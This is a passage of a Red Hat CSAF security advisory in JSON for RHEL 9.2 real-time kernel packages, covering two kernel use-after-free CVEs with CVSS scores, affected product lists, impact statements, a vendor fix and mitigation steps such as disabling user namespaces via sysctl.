"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-51043"
},
{
"category": "external",
"summary": "RHBZ#2260005",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260005"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-51043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51043"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-51043",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51043"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255",
"url": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255"
}
],
"release_date": "2024-01-23T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "To mitigate this issue, prevent module drm from being loaded. Please see https://access.redhat.com/solutions/41278 for how to blacklist a kernel module to prevent it from loading automatically.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "kernel: use-after-free during a race condition between a nonblocking atomic commit and a driver unload in drivers/gpu/drm/drm_atomic.c"
},
{
"cve": "CVE-2024-0193",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-22T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255653"
}
],
"notes": [
{
"category": "description",
"text": "A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The upstream commit that introduced this flaw (5f68718b34a5 \"netfilter: nf_tables: GC transaction API to avoid race with control plane\") is not included in any shipped kernel releases of Red Hat Enterprise Linux 6, 7, and 8.\n\nOnly local users with `CAP_NET_ADMIN` capability or root can trigger this issue. \nOn Red Hat Enterprise Linux, local unprivileged users can exploit unprivileged user namespaces (CONFIG_USER_NS) to grant themselves this capability.\n\nThe OpenShift Container Platform (OCP) control planes or master machines are based on Red Hat Enterprise Linux CoreOS (RHCOS) that consists primarily of RHEL components, therefore, it is also affected by this kernel vulnerability. A successful exploit needs necessary privileges (CAP_NET_ADMIN) and direct, local access. A local user in RHCOS is already a root with full permissions, hence existence of this vulnerability does not bring any value from the potential attacker perspective. From the OpenShift containers perspective, this vulnerability cannot be exploited as in OpenShift the cluster processes on the node are namespaced, which means that switching the namespace in the running OpenShift container will not bring necessary capabilities.\nThis means that for OpenShift, the impact of this vulnerability is Low.\n\nSimilar to the CVE-2023-32233 vulnerability, this has been explained in the following blog post as an example of a \"Container escape vulnerability\":\nhttps://www.redhat.com/en/blog/containers-vulnerability-risk-assessment",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-0193"
},
{
"category": "external",
"summary": "RHBZ#2255653",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255653"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-0193",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0193"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-0193",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0193"
}
],
"release_date": "2024-01-02T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:1019"
},
{
"category": "workaround",
"details": "In order to trigger the issue, it requires the ability to create user/net namespaces.\n\nOn non-containerized deployments of Red Hat Enterprise Linux 8, you can disable user namespaces by setting user.max_user_namespaces to 0:\n\n# echo \"user.max_user_namespaces=0\" \u003e /etc/sysctl.d/userns.conf\n# sysctl -p /etc/sysctl.d/userns.conf\n\nOn containerized deployments, such as Red Hat OpenShift Container Platform, do not use this mitigation as the functionality is needed to be enabled.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
